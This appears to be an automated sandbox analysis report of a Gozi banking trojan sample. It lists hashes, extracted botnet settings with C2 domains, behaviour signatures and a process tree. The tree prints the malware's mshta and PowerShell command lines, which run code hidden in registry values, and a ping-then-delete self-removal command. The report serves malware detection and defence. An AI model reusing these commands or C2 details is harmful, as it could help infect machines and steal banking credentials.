Overview

overview

10

Static

static

3

7665e79318...e6.exe

windows7-x64

10

7665e79318...e6.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-10-2023 13:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe

  • Size

    304KB

  • MD5

    a3f4c907a088c99a8b7bf5f4280d7d0c

  • SHA1

    9a9297bd0af1c008eb7477c1e310ce70c30c6d56

  • SHA256

    7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6

  • SHA512

    106a0a4275a421a6dbef6c43e76921e6eae1aca5f6d960f823763a3127b7ebf826c626da460db82451aba4a94c32c8c198d6871b0a2c6de7d96c937384e92f9b

  • SSDEEP

    6144:Oo+91vDNpa6NK56upTHirwtc3nhBvjQOR/Oz2IHTN+:ONDLu4K56u1HqfhBvjQOWz2W

Score
10/10
gozi5050bankerdaveisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

mifrutty.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

http://igrovdow.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Dave packer 1 IoCs

    Detects executable using a packer named 'Dave' by the community, based on a string at the end.

    dave
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3716
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4808
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3956
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3112
        • C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe
          "C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4260
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Owxo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Owxo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\79A35AC8-8476-1390-56BD-F8F7EA41AC1B\\\CharControl'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2088
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name lxtqxekpi -value gp; new-alias -name wbfxbmc -value iex; wbfxbmc ([System.Text.Encoding]::ASCII.GetString((lxtqxekpi "HKCU:Software\AppDataLow\Software\Microsoft\79A35AC8-8476-1390-56BD-F8F7EA41AC1B").TimeAbout))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4984
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zaqr2mpt\zaqr2mpt.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3732
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5222.tmp" "c:\Users\Admin\AppData\Local\Temp\zaqr2mpt\CSC8C5129D4B8FB415B93F394241FC7276.TMP"
                5⤵
                  PID:2268
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hibvjoxt\hibvjoxt.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:2144
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES52DE.tmp" "c:\Users\Admin\AppData\Local\Temp\hibvjoxt\CSC9566FDB9216B41B7B31C791F1E6449E8.TMP"
                  5⤵
                    PID:3800
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:4420
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\7665e793186c3c83ec2c2c69adaee5e81ec60d395d8714921352296a5ab88ae6.exe"
                2⤵
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:4516
                • C:\Windows\system32\PING.EXE
                  ping localhost -n 5
                  3⤵
                  • Runs ping.exe
                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                  PID:1364
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:1464
            • C:\Windows\system32\rundll32.exe
              "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
              1⤵
                PID:3500
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3880

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Initial Access

              Execution

              Persistence

              Privilege Escalation

              Defense Evasion

              Credential Access

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              2
              T1082

              Remote System Discovery

              1
              T1018

              Lateral Movement

              Collection

              Exfiltration

              Command and Control

              Impact

              Resource Development

              Reconnaissance

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm
                Filesize

                16KB

                MD5

                bec7af9307556e2d1cbe0ca7dea7d330

                SHA1

                0a070d2982e0437747e4fffd754e9902a1ecc226

                SHA256

                2e50390e1bd51437c19c0b5bd1d0462cbf52595fafd21cc09f099d8ba3203bc1

                SHA512

                674f08cf62af3f4c95104a7184d11aa95c2d4250ca7596291a0c562efb2b7ac9d9db88cf6db31986a2d498a2716e11bdf426d8370d67b22a072444c5f76a7ce6

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES5222.tmp
                Filesize

                1KB

                MD5

                4400ec5e22635bc2be0704b26727da37

                SHA1

                8ea046744ce2923c27b4aa58bd92371681ce741d

                SHA256

                101ae5b67d1de8752910f6389d5b2fb7ba99cd3ca28d6292c83d7cbf9fa1ad14

                SHA512

                6d3f49c62434cb714df0d3aa172b67a9013cb8a0646cd438dbd10de3e2a219488aa4db83b46e529dcef5410ec4a9f55c68a4281ec91519aa7f4ed9f08c2b6c87

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\RES52DE.tmp
                Filesize

                1KB

                MD5

                0354885364fa937f4497a50195a6d278

                SHA1

                bdd788d9f5518581f5908abbb9a5aaaaf175767a

                SHA256

                226081656aefac3e9a83d76cb60f9225d75ead73b432d174561d92f9aeba1413

                SHA512

                f35bd1b19623a1ec1b2eae8fa5f6e5ba1abd90abb32433fa6b45c3c0ea9e86091ad96ca7f9c989cbf0fca2106ba64997c27455a26327617cf2411e6324d0cdf1

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dvet00xc.pxp.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\hibvjoxt\hibvjoxt.dll
                Filesize

                3KB

                MD5

                77d4797f74d9dfb0a9023d5fc36fab3e

                SHA1

                8c8cb77324debafbc4aa59b92fc2bac91935117c

                SHA256

                e61f9f0414a791b7fb06347fbe030d0ba892eada890182c828e30ce138aeadaf

                SHA512

                21b91f1396d61b404dec3d7dc61edf0899a1a16f440fd43c935c387d4946f59204f5f6ad7640a98202dbdd95073b2ab9240f728b0bf6461f101a203bab4be523

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\zaqr2mpt\zaqr2mpt.dll
                Filesize

                3KB

                MD5

                f0a1338d6953444cd5437a9486cb9842

                SHA1

                52fdbe5e5f9ff4d5d43861a6e3aadfdfad908483

                SHA256

                94106f130507c8c322e4da4acab2b7d51a3537db8ba3bc06202c0fbef50836a4

                SHA512

                82b235ea58ca73c19b1b834a32e86bed050ed7b88548cf0f7577dedca87a3a074ad216e986c41cb3836b04ac420f766499b0fe0fa52751ea719e97ac6a9285ed

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\hibvjoxt\CSC9566FDB9216B41B7B31C791F1E6449E8.TMP
                Filesize

                652B

                MD5

                f189b0431c5216927e0a47bac58e5bae

                SHA1

                e7e1c5180362c58fd87dd03d26f3dfead68c79a4

                SHA256

                f4a5ed59c7b050cbd29b73dbc74961c39028f0c764ee72cde67bc755f58d0e66

                SHA512

                c056d47a61258cb4330bd54bf3a447ab8d534ad75b5b1d8dc510a43e30d91ff59ebdeb45b4163a33c499ab2661966f030af8a0bf6099df2904c8e2cefe7ccdce

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\hibvjoxt\hibvjoxt.0.cs
                Filesize

                406B

                MD5

                ca8887eacd573690830f71efaf282712

                SHA1

                0acd4f49fc8cf6372950792402ec3aeb68569ef8

                SHA256

                568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

                SHA512

                2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\hibvjoxt\hibvjoxt.cmdline
                Filesize

                369B

                MD5

                2d86636a2eac0602e5a4b5bdcdc9780e

                SHA1

                da299094681b4c70cb540bea8bc021fc27a6b8ce

                SHA256

                50e5efdb91284397bd993285d96b507301f5a80c82b3b07fb459b9918e37f312

                SHA512

                94f1a22b48eb752c1edd72bd4b8a3a27e2eaeaf4bec2061246f30669309d4bc634d4cab3c777aca0087b7e9fb0f25c8a138dbdd9526a31e738816610eca8748b

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zaqr2mpt\CSC8C5129D4B8FB415B93F394241FC7276.TMP
                Filesize

                652B

                MD5

                47493c3af99d5cb5f92dea601f3026b1

                SHA1

                7900c282cf213d6fbb3aacfef41358cada692feb

                SHA256

                42ae188f0fc9137ab8883d81c261238090c87270aa44f735be8318dd900ab07a

                SHA512

                b9a2990a19222e1026c7a96cfa8a996c153ecf487f1556f94ac7c77a22337b5c55f41233d5bfc282808bc80606283e4004402abe642764bab7f2e3d3d72cf550

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zaqr2mpt\zaqr2mpt.0.cs
                Filesize

                405B

                MD5

                caed0b2e2cebaecd1db50994e0c15272

                SHA1

                5dfac9382598e0ad2e700de4f833de155c9c65fa

                SHA256

                21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

                SHA512

                86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

                Download Submit
              • \??\c:\Users\Admin\AppData\Local\Temp\zaqr2mpt\zaqr2mpt.cmdline
                Filesize

                369B

                MD5

                ad0cc38770f09f9947cc05bfcb1d6a58

                SHA1

                084268cdf815206d28919e8dd3c00c0ce9dd8a02

                SHA256

                7afacd249535d86f77198600d24faa11ed9ec7bafa0b432968a20ebb49fa182b

                SHA512

                b3df64ac261fc593c5a8207eafe2b83cc027d93065da4b34ef4c946f5b65a213a3ca8aaab932335273bc73f054f6e182cca5a1a9d9497e34655dec55b0a87838

                Download Submit
              • memory/1364-111-0x000001AC6CAD0000-0x000001AC6CB74000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1364-112-0x000001AC6CB80000-0x000001AC6CB81000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1364-119-0x000001AC6CAD0000-0x000001AC6CB74000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1464-90-0x000001BA38340000-0x000001BA383E4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/1464-92-0x000001BA383F0000-0x000001BA383F1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1464-118-0x000001BA38340000-0x000001BA383E4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3112-100-0x0000000009650000-0x00000000096F4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3112-60-0x00000000032B0000-0x00000000032B1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3112-59-0x0000000009650000-0x00000000096F4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3716-108-0x0000024967300000-0x00000249673A4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3716-73-0x0000024967300000-0x00000249673A4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3716-74-0x0000024966DA0000-0x0000024966DA1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/3880-137-0x0000028587180000-0x0000028587190000-memory.dmp
                Filesize

                64KB

                Download
              • memory/3880-121-0x0000028587080000-0x0000028587090000-memory.dmp
                Filesize

                64KB

                Download
              • memory/3956-115-0x0000028B87E40000-0x0000028B87EE4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3956-78-0x0000028B87E40000-0x0000028B87EE4000-memory.dmp
                Filesize

                656KB

                Download
              • memory/3956-80-0x0000028B87E00000-0x0000028B87E01000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4260-1-0x00000000012B0000-0x00000000012BC000-memory.dmp
                Filesize

                48KB

                Download
              • memory/4260-5-0x0000000000400000-0x000000000040F000-memory.dmp
                Filesize

                60KB

                Download
              • memory/4260-11-0x00000000012F0000-0x00000000012FD000-memory.dmp
                Filesize

                52KB

                Download
              • memory/4260-0-0x00000000012C0000-0x00000000012CF000-memory.dmp
                Filesize

                60KB

                Download
              • memory/4420-109-0x0000000000DF0000-0x0000000000E88000-memory.dmp
                Filesize

                608KB

                Download
              • memory/4420-99-0x0000000000DF0000-0x0000000000E88000-memory.dmp
                Filesize

                608KB

                Download
              • memory/4420-106-0x0000000000A10000-0x0000000000A11000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4516-98-0x000001F28DA70000-0x000001F28DB14000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4516-120-0x000001F28DA70000-0x000001F28DB14000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4516-103-0x000001F28D920000-0x000001F28D921000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4808-117-0x0000023EFFED0000-0x0000023EFFF74000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4808-86-0x0000023EFF780000-0x0000023EFF781000-memory.dmp
                Filesize

                4KB

                Download
              • memory/4808-84-0x0000023EFFED0000-0x0000023EFFF74000-memory.dmp
                Filesize

                656KB

                Download
              • memory/4984-27-0x0000025A64230000-0x0000025A64240000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4984-28-0x0000025A64230000-0x0000025A64240000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4984-25-0x00007FFA45F20000-0x00007FFA469E1000-memory.dmp
                Filesize

                10.8MB

                Download
              • memory/4984-57-0x0000025A7C7D0000-0x0000025A7C80D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4984-15-0x0000025A7C650000-0x0000025A7C672000-memory.dmp
                Filesize

                136KB

                Download
              • memory/4984-71-0x0000025A7C7D0000-0x0000025A7C80D000-memory.dmp
                Filesize

                244KB

                Download
              • memory/4984-26-0x0000025A64230000-0x0000025A64240000-memory.dmp
                Filesize

                64KB

                Download
              • memory/4984-41-0x0000025A642E0000-0x0000025A642E8000-memory.dmp
                Filesize

                32KB

                Download
              • memory/4984-55-0x0000025A7C7C0000-0x0000025A7C7C8000-memory.dmp
                Filesize

                32KB

                Download
              • memory/4984-70-0x00007FFA45F20000-0x00007FFA469E1000-memory.dmp
                Filesize

                10.8MB

                Download